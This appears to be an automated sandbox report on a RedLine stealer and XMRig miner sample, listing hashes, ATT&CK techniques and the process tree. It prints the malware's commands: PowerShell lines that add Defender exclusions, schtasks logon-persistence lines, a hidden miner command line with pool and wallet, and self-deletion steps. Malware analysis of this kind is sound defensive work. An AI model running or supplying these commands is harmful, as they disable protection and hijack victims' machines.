redline | 19b8025cf8a5ddc24a7b75b5f4ca52132aa6659c277d9d78e4d91989e9408999

Analysis

max time kernel
150s
max time network
141s
platform
windows10_x64
resource
win10-en-20211208
submitted
09-12-2021 18:14

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

19b8025cf8a5ddc24a7b75b5f4ca52132aa6659c277d9d78e4d91989e9408999.exe
Size

1.3MB
MD5

51059f0b8dea23a1d153ae103abd2e50
SHA1

4747f2fef8721a247c2c756636255eab845a907c
SHA256

19b8025cf8a5ddc24a7b75b5f4ca52132aa6659c277d9d78e4d91989e9408999
SHA512

b5808f132917a46b476cd61d7a3cf3113b3578b99b01098a6b028560b7d5f7025c8e8261a2ff13ceb62cb3ebf0fbcb554070c8d414e8491e49f72d58f344ffa3

Score

10^/10

redline xmrig discovery evasion infostealer miner spyware stealer trojan

Malware Config

Signatures

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 1 IoCs

Processes:

resource	yara_rule
behavioral1/memory/2064-125-0x0000000000400000-0x000000000075E000-memory.dmp	family_redline

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

XMRig Miner Payload 1 IoCs

miner

Processes:

resource	yara_rule
behavioral1/memory/3616-517-0x000000014030F3F8-mapping.dmp	xmrig

Downloads MZ/PE file
Executes dropped EXE 9 IoCs

Processes:

123.exe---.exe1.exesvchost64.exeservices64.exesvchost64.exesihost64.exeruntimeservice.exesihost32.exe

pid process

3676 123.exe
1736 ---.exe
1192 1.exe
3164 svchost64.exe
3952 services64.exe
2148 svchost64.exe
652 sihost64.exe
3256 runtimeservice.exe
2380 sihost32.exe

pid	process
3676	123.exe
1736	---.exe
1192	1.exe
3164	svchost64.exe
3952	services64.exe
2148	svchost64.exe
652	sihost64.exe
3256	runtimeservice.exe
2380	sihost32.exe

Checks BIOS information in registry 2 TTPs 12 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

1.exeservices64.exesihost64.exe19b8025cf8a5ddc24a7b75b5f4ca52132aa6659c277d9d78e4d91989e9408999.exesvchost64.exesvchost64.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	1.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	services64.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	sihost64.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	19b8025cf8a5ddc24a7b75b5f4ca52132aa6659c277d9d78e4d91989e9408999.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	19b8025cf8a5ddc24a7b75b5f4ca52132aa6659c277d9d78e4d91989e9408999.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	svchost64.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	services64.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	svchost64.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	svchost64.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	sihost64.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	1.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	svchost64.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

19b8025cf8a5ddc24a7b75b5f4ca52132aa6659c277d9d78e4d91989e9408999.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	19b8025cf8a5ddc24a7b75b5f4ca52132aa6659c277d9d78e4d91989e9408999.exe

Drops file in System32 directory 5 IoCs

Processes:

svchost64.exesvchost64.exe

description	ioc	process
File created	C:\Windows\system32\services64.exe	svchost64.exe
File opened for modification	C:\Windows\system32\services64.exe	svchost64.exe
File created	C:\Windows\system32\Microsoft\Libs\sihost64.exe	svchost64.exe
File created	C:\Windows\system32\Microsoft\Libs\WR64.sys	svchost64.exe
File created	C:\Windows\system32\Microsoft\Libs\sihost64.log	svchost64.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

svchost64.exe

description pid process target process

PID 2148 set thread context of 3616 2148 svchost64.exe explorer.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

1976 schtasks.exe
3840 schtasks.exe
2000 schtasks.exe
2320 schtasks.exe

description	pid	process	target process
PID 2148 set thread context of 3616	2148	svchost64.exe	explorer.exe

pid	process
1976	schtasks.exe
3840	schtasks.exe
2000	schtasks.exe
2320	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

19b8025cf8a5ddc24a7b75b5f4ca52132aa6659c277d9d78e4d91989e9408999.exepowershell.exepowershell.exesvchost64.exepowershell.exepowershell.exepowershell.exepowershell.exe123.exesvchost64.exepowershell.exeexplorer.exepowershell.exeruntimeservice.exe

pid	process
2064	19b8025cf8a5ddc24a7b75b5f4ca52132aa6659c277d9d78e4d91989e9408999.exe
1924	powershell.exe
1924	powershell.exe
1924	powershell.exe
3212	powershell.exe
3212	powershell.exe
3212	powershell.exe
3164	svchost64.exe
3276	powershell.exe
3276	powershell.exe
3276	powershell.exe
2440	powershell.exe
2440	powershell.exe
2440	powershell.exe
2200	powershell.exe
2200	powershell.exe
2200	powershell.exe
976	powershell.exe
976	powershell.exe
976	powershell.exe
3676	123.exe
2148	svchost64.exe
3692	powershell.exe
3692	powershell.exe
3692	powershell.exe
3616	explorer.exe
3616	explorer.exe
1712	powershell.exe
1712	powershell.exe
1712	powershell.exe
3616	explorer.exe
3616	explorer.exe
3616	explorer.exe
3616	explorer.exe
3616	explorer.exe
3616	explorer.exe
3616	explorer.exe
3616	explorer.exe
3616	explorer.exe
3616	explorer.exe
3616	explorer.exe
3616	explorer.exe
3256	runtimeservice.exe
3616	explorer.exe
3616	explorer.exe
3616	explorer.exe
3616	explorer.exe
3616	explorer.exe
3616	explorer.exe
3616	explorer.exe
3616	explorer.exe
3616	explorer.exe
3616	explorer.exe
3616	explorer.exe
3616	explorer.exe
3616	explorer.exe
3616	explorer.exe
3616	explorer.exe
3616	explorer.exe
3616	explorer.exe
3616	explorer.exe
3616	explorer.exe
3616	explorer.exe
3616	explorer.exe

Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

620

pid	process
620

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

19b8025cf8a5ddc24a7b75b5f4ca52132aa6659c277d9d78e4d91989e9408999.exepowershell.exepowershell.exesvchost64.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	2064	19b8025cf8a5ddc24a7b75b5f4ca52132aa6659c277d9d78e4d91989e9408999.exe
Token: SeDebugPrivilege	1924	powershell.exe
Token: SeIncreaseQuotaPrivilege	1924	powershell.exe
Token: SeSecurityPrivilege	1924	powershell.exe
Token: SeTakeOwnershipPrivilege	1924	powershell.exe
Token: SeLoadDriverPrivilege	1924	powershell.exe
Token: SeSystemProfilePrivilege	1924	powershell.exe
Token: SeSystemtimePrivilege	1924	powershell.exe
Token: SeProfSingleProcessPrivilege	1924	powershell.exe
Token: SeIncBasePriorityPrivilege	1924	powershell.exe
Token: SeCreatePagefilePrivilege	1924	powershell.exe
Token: SeBackupPrivilege	1924	powershell.exe
Token: SeRestorePrivilege	1924	powershell.exe
Token: SeShutdownPrivilege	1924	powershell.exe
Token: SeDebugPrivilege	1924	powershell.exe
Token: SeSystemEnvironmentPrivilege	1924	powershell.exe
Token: SeRemoteShutdownPrivilege	1924	powershell.exe
Token: SeUndockPrivilege	1924	powershell.exe
Token: SeManageVolumePrivilege	1924	powershell.exe
Token: 33	1924	powershell.exe
Token: 34	1924	powershell.exe
Token: 35	1924	powershell.exe
Token: 36	1924	powershell.exe
Token: SeDebugPrivilege	3212	powershell.exe
Token: SeIncreaseQuotaPrivilege	3212	powershell.exe
Token: SeSecurityPrivilege	3212	powershell.exe
Token: SeTakeOwnershipPrivilege	3212	powershell.exe
Token: SeLoadDriverPrivilege	3212	powershell.exe
Token: SeSystemProfilePrivilege	3212	powershell.exe
Token: SeSystemtimePrivilege	3212	powershell.exe
Token: SeProfSingleProcessPrivilege	3212	powershell.exe
Token: SeIncBasePriorityPrivilege	3212	powershell.exe
Token: SeCreatePagefilePrivilege	3212	powershell.exe
Token: SeBackupPrivilege	3212	powershell.exe
Token: SeRestorePrivilege	3212	powershell.exe
Token: SeShutdownPrivilege	3212	powershell.exe
Token: SeDebugPrivilege	3212	powershell.exe
Token: SeSystemEnvironmentPrivilege	3212	powershell.exe
Token: SeRemoteShutdownPrivilege	3212	powershell.exe
Token: SeUndockPrivilege	3212	powershell.exe
Token: SeManageVolumePrivilege	3212	powershell.exe
Token: 33	3212	powershell.exe
Token: 34	3212	powershell.exe
Token: 35	3212	powershell.exe
Token: 36	3212	powershell.exe
Token: SeDebugPrivilege	3164	svchost64.exe
Token: SeDebugPrivilege	3276	powershell.exe
Token: SeIncreaseQuotaPrivilege	3276	powershell.exe
Token: SeSecurityPrivilege	3276	powershell.exe
Token: SeTakeOwnershipPrivilege	3276	powershell.exe
Token: SeLoadDriverPrivilege	3276	powershell.exe
Token: SeSystemProfilePrivilege	3276	powershell.exe
Token: SeSystemtimePrivilege	3276	powershell.exe
Token: SeProfSingleProcessPrivilege	3276	powershell.exe
Token: SeIncBasePriorityPrivilege	3276	powershell.exe
Token: SeCreatePagefilePrivilege	3276	powershell.exe
Token: SeBackupPrivilege	3276	powershell.exe
Token: SeRestorePrivilege	3276	powershell.exe
Token: SeShutdownPrivilege	3276	powershell.exe
Token: SeDebugPrivilege	3276	powershell.exe
Token: SeSystemEnvironmentPrivilege	3276	powershell.exe
Token: SeRemoteShutdownPrivilege	3276	powershell.exe
Token: SeUndockPrivilege	3276	powershell.exe
Token: SeManageVolumePrivilege	3276	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

19b8025cf8a5ddc24a7b75b5f4ca52132aa6659c277d9d78e4d91989e9408999.exe---.exe1.execmd.execmd.exesvchost64.execmd.execmd.exeservices64.execmd.execmd.exe123.execmd.exesvchost64.execmd.exe

description	pid	process	target process
PID 2064 wrote to memory of 3676	2064	19b8025cf8a5ddc24a7b75b5f4ca52132aa6659c277d9d78e4d91989e9408999.exe	123.exe
PID 2064 wrote to memory of 3676	2064	19b8025cf8a5ddc24a7b75b5f4ca52132aa6659c277d9d78e4d91989e9408999.exe	123.exe
PID 2064 wrote to memory of 1736	2064	19b8025cf8a5ddc24a7b75b5f4ca52132aa6659c277d9d78e4d91989e9408999.exe	---.exe
PID 2064 wrote to memory of 1736	2064	19b8025cf8a5ddc24a7b75b5f4ca52132aa6659c277d9d78e4d91989e9408999.exe	---.exe
PID 2064 wrote to memory of 1736	2064	19b8025cf8a5ddc24a7b75b5f4ca52132aa6659c277d9d78e4d91989e9408999.exe	---.exe
PID 1736 wrote to memory of 1192	1736	---.exe	1.exe
PID 1736 wrote to memory of 1192	1736	---.exe	1.exe
PID 1192 wrote to memory of 1752	1192	1.exe	cmd.exe
PID 1192 wrote to memory of 1752	1192	1.exe	cmd.exe
PID 1752 wrote to memory of 1924	1752	cmd.exe	powershell.exe
PID 1752 wrote to memory of 1924	1752	cmd.exe	powershell.exe
PID 1752 wrote to memory of 3212	1752	cmd.exe	powershell.exe
PID 1752 wrote to memory of 3212	1752	cmd.exe	powershell.exe
PID 1192 wrote to memory of 2752	1192	1.exe	cmd.exe
PID 1192 wrote to memory of 2752	1192	1.exe	cmd.exe
PID 2752 wrote to memory of 3164	2752	cmd.exe	svchost64.exe
PID 2752 wrote to memory of 3164	2752	cmd.exe	svchost64.exe
PID 3164 wrote to memory of 3928	3164	svchost64.exe	cmd.exe
PID 3164 wrote to memory of 3928	3164	svchost64.exe	cmd.exe
PID 3928 wrote to memory of 2000	3928	cmd.exe	schtasks.exe
PID 3928 wrote to memory of 2000	3928	cmd.exe	schtasks.exe
PID 1752 wrote to memory of 3276	1752	cmd.exe	powershell.exe
PID 1752 wrote to memory of 3276	1752	cmd.exe	powershell.exe
PID 1752 wrote to memory of 2440	1752	cmd.exe	powershell.exe
PID 1752 wrote to memory of 2440	1752	cmd.exe	powershell.exe
PID 3164 wrote to memory of 3952	3164	svchost64.exe	services64.exe
PID 3164 wrote to memory of 3952	3164	svchost64.exe	services64.exe
PID 3164 wrote to memory of 344	3164	svchost64.exe	cmd.exe
PID 3164 wrote to memory of 344	3164	svchost64.exe	cmd.exe
PID 344 wrote to memory of 2128	344	cmd.exe	choice.exe
PID 344 wrote to memory of 2128	344	cmd.exe	choice.exe
PID 3952 wrote to memory of 3540	3952	services64.exe	cmd.exe
PID 3952 wrote to memory of 3540	3952	services64.exe	cmd.exe
PID 3540 wrote to memory of 2200	3540	cmd.exe	powershell.exe
PID 3540 wrote to memory of 2200	3540	cmd.exe	powershell.exe
PID 3540 wrote to memory of 976	3540	cmd.exe	powershell.exe
PID 3540 wrote to memory of 976	3540	cmd.exe	powershell.exe
PID 3952 wrote to memory of 4052	3952	services64.exe	cmd.exe
PID 3952 wrote to memory of 4052	3952	services64.exe	cmd.exe
PID 4052 wrote to memory of 2148	4052	cmd.exe	svchost64.exe
PID 4052 wrote to memory of 2148	4052	cmd.exe	svchost64.exe
PID 3676 wrote to memory of 1608	3676	123.exe	cmd.exe
PID 3676 wrote to memory of 1608	3676	123.exe	cmd.exe
PID 1608 wrote to memory of 2320	1608	cmd.exe	schtasks.exe
PID 1608 wrote to memory of 2320	1608	cmd.exe	schtasks.exe
PID 2148 wrote to memory of 3912	2148	svchost64.exe	cmd.exe
PID 2148 wrote to memory of 3912	2148	svchost64.exe	cmd.exe
PID 3912 wrote to memory of 1976	3912	cmd.exe	schtasks.exe
PID 3912 wrote to memory of 1976	3912	cmd.exe	schtasks.exe
PID 2148 wrote to memory of 652	2148	svchost64.exe	sihost64.exe
PID 2148 wrote to memory of 652	2148	svchost64.exe	sihost64.exe
PID 3540 wrote to memory of 3692	3540	cmd.exe	powershell.exe
PID 3540 wrote to memory of 3692	3540	cmd.exe	powershell.exe
PID 3676 wrote to memory of 3256	3676	123.exe	runtimeservice.exe
PID 3676 wrote to memory of 3256	3676	123.exe	runtimeservice.exe
PID 2148 wrote to memory of 3616	2148	svchost64.exe	explorer.exe
PID 2148 wrote to memory of 3616	2148	svchost64.exe	explorer.exe
PID 2148 wrote to memory of 3616	2148	svchost64.exe	explorer.exe
PID 2148 wrote to memory of 3616	2148	svchost64.exe	explorer.exe
PID 2148 wrote to memory of 3616	2148	svchost64.exe	explorer.exe
PID 2148 wrote to memory of 3616	2148	svchost64.exe	explorer.exe
PID 2148 wrote to memory of 3616	2148	svchost64.exe	explorer.exe
PID 2148 wrote to memory of 3616	2148	svchost64.exe	explorer.exe
PID 2148 wrote to memory of 3616	2148	svchost64.exe	explorer.exe

C:\Users\Admin\AppData\Local\Temp\19b8025cf8a5ddc24a7b75b5f4ca52132aa6659c277d9d78e4d91989e9408999.exe
"C:\Users\Admin\AppData\Local\Temp\19b8025cf8a5ddc24a7b75b5f4ca52132aa6659c277d9d78e4d91989e9408999.exe"
1⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2064

C:\Users\Admin\AppData\Local\Temp\123.exe
"C:\Users\Admin\AppData\Local\Temp\123.exe"
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3676

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "runtimeservice" /tr '"C:\Users\Admin\AppData\Roaming\runtimeservice.exe"' & exit
3⤵
- Suspicious use of WriteProcessMemory
PID:1608

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "runtimeservice" /tr '"C:\Users\Admin\AppData\Roaming\runtimeservice.exe"'
4⤵
- Creates scheduled task(s)
PID:2320

C:\Users\Admin\AppData\Roaming\runtimeservice.exe
"C:\Users\Admin\AppData\Roaming\runtimeservice.exe"
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:3256

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "runtimeservice" /tr '"C:\Users\Admin\AppData\Roaming\runtimeservice.exe"' & exit
4⤵
PID:2088

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "runtimeservice" /tr '"C:\Users\Admin\AppData\Roaming\runtimeservice.exe"'
5⤵
- Creates scheduled task(s)
PID:3840

C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe"
4⤵
- Executes dropped EXE
PID:2380

C:\Users\Admin\AppData\Local\Temp\---.exe
"C:\Users\Admin\AppData\Local\Temp\---.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1736

C:\Users\Admin\AppData\Local\Temp\RarSFX0\1.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\1.exe"
3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Suspicious use of WriteProcessMemory
PID:1192

C:\Windows\SYSTEM32\cmd.exe
"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
4⤵
- Suspicious use of WriteProcessMemory
PID:1752

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1924

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3212

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3276

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
5⤵
- Suspicious behavior: EnumeratesProcesses
PID:2440

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Users\Admin\AppData\Local\Temp\RarSFX0\1.exe"
4⤵
- Suspicious use of WriteProcessMemory
PID:2752

C:\Users\Admin\AppData\Local\Temp\svchost64.exe
C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Users\Admin\AppData\Local\Temp\RarSFX0\1.exe"
5⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3164

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"' & exit
6⤵
- Suspicious use of WriteProcessMemory
PID:3928

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"'
7⤵
- Creates scheduled task(s)
PID:2000

C:\Windows\system32\services64.exe
"C:\Windows\system32\services64.exe"
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Suspicious use of WriteProcessMemory
PID:3952

C:\Windows\system32\cmd.exe
"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
7⤵
- Suspicious use of WriteProcessMemory
PID:3540

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
8⤵
- Suspicious behavior: EnumeratesProcesses
PID:2200

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
8⤵
- Suspicious behavior: EnumeratesProcesses
PID:976

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
8⤵
- Suspicious behavior: EnumeratesProcesses
PID:3692

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
8⤵
- Suspicious behavior: EnumeratesProcesses
PID:1712

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Windows\system32\services64.exe"
7⤵
- Suspicious use of WriteProcessMemory
PID:4052

C:\Users\Admin\AppData\Local\Temp\svchost64.exe
C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Windows\system32\services64.exe"
8⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2148

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"' & exit
9⤵
- Suspicious use of WriteProcessMemory
PID:3912

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"'
10⤵
- Creates scheduled task(s)
PID:1976

C:\Windows\system32\Microsoft\Libs\sihost64.exe
"C:\Windows\system32\Microsoft\Libs\sihost64.exe"
9⤵
- Executes dropped EXE
- Checks BIOS information in registry
PID:652

C:\Windows\explorer.exe
C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=43A1dtzLDTB9kdUDuFJaAuZX9t7a8R1VQM1AtVKv71kQKmgZfNfM9dF4ciYcKGbEX8VjrSVry6iz8LwWC1G3BUykSfZJT1T --pass=RIG-1 --cpu-max-threads-hint=70 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=2 --cinit-idle-cpu=100 --nicehash --tls --cinit-stealth
9⤵
- Suspicious behavior: EnumeratesProcesses
PID:3616

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost64.exe"
9⤵
PID:8

C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
10⤵
PID:3124

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost64.exe"
6⤵
- Suspicious use of WriteProcessMemory
PID:344

C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
7⤵
PID:2128

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Virtualization/Sandbox Evasion

T1497

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
MD5
8592ba100a78835a6b94d5949e13dfc1

SHA1
63e901200ab9a57c7dd4c078d7f75dcd3b357020

SHA256
fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c

SHA512
87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\svchost64.exe.log
MD5
84f2160705ac9a032c002f966498ef74

SHA1
e9f3db2e1ad24a4f7e5c203af03bbc07235e704c

SHA256
7840ca7ea27e8a24ebc4877774be6013ab4f81d1eb83c121e4c3290ceb532d93

SHA512
f41c289770d8817ee612e53880d3f6492d50d08fb5104bf76440c2a93539dd25f6f15179b318e67b9202aabbe802941f80ac2dbadfd6ff1081b0d37c33f9da57

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
6f499dbc313f1180238f9e00759b5368

SHA1
f25d999b7b601dc4a5e179d93d9b26d2d103dd7c

SHA256
c18fedb15ed7a7136582e841c2c2dbe42356f16e53edb5a23376d028087726ac

SHA512
f7a9c18d93e4ec518db5933734301cb04fb4cbc099d838129cda5451f7be699755a1874c7213dd9f15ea2cf61e9a0285731f783e2b81835217314b40576d06c9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
a1fbcb6d62817d30c22d16f904224659

SHA1
0e9d19ae36d2bf3b4dd9449ba992b02ec911b127

SHA256
fab57a02d55c0a2d5e0d53a549c902c3297c09fe56e2db5b71596513ef024cbb

SHA512
7b111fde5231127be573090bcc35605a1ceff019af9327e4e48705d24b8234eee1f88cb93287452b6e49f6479c857849b2e17aaae545e6155067eb12581da2ca

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
6d801d717757944f10d3e57812b2b721

SHA1
c1b2d3d9f420a459273ee1a53602aeb7d5b7cdfc

SHA256
aa1f0425979c9384f558e287afe5bff9f70857ee77fa1c381d649f5f94cbc317

SHA512
cb5e0499eda743c750c72af64e1e1e243cbf74795dc3782b35c0604e8f0888655a4a014b6e61a48d2c807cd8eac8434ddca47e1edd6af5198dc587277facf190

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
8a64235653fddf896937c8e15d85cff7

SHA1
67be4e28e6fbe5ff5cb51fbcbb27aa7a20763709

SHA256
371702fbf8d144d1873d6146474d0c07fcf9741d8ceeaf1892e93005f14ff166

SHA512
b418949a31d686b383e4cbb3d192289d45689dd77a790c5dc85e4a44cbcd3675e1069299a07acfa27a2ed4764f1470abf4205b4c0a9be3161bbb04169621fd0b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
8a64235653fddf896937c8e15d85cff7

SHA1
67be4e28e6fbe5ff5cb51fbcbb27aa7a20763709

SHA256
371702fbf8d144d1873d6146474d0c07fcf9741d8ceeaf1892e93005f14ff166

SHA512
b418949a31d686b383e4cbb3d192289d45689dd77a790c5dc85e4a44cbcd3675e1069299a07acfa27a2ed4764f1470abf4205b4c0a9be3161bbb04169621fd0b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
733bf67581b3f57964a25235666ce91e

SHA1
ac0fab187347f90f21da0b5ef925931ccd25812c

SHA256
9d1477cdacdd48c1e56a5475cc064845864cf7aa083118b4811d9ff12f54510d

SHA512
a3cbcc3d5b4b4f31fe7443d6dda9debfd0a5f3a38f624df9660a5e6a7d977a466eddd730d54d8b28232bd850f4649d78574bfbda70f2a554f02e2efa8bb5034a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
fd4fdd3a2f3db00d6d02396784028034

SHA1
0486341780ed1b58670996e9aa3e50c1b0f6c8e7

SHA256
178ad49c22c55595cc4a9620b80877c074314136f7f4ad7a2289fd30b35759e8

SHA512
c33bd7d838a0a910da1bed964ac19f49c3b0a27b0b30002e538335904a2d517a7f37fff7e8883d0aa46dab3bd4262c7139c1d4519a59d2cc524964ed17d835d7

Download Submit
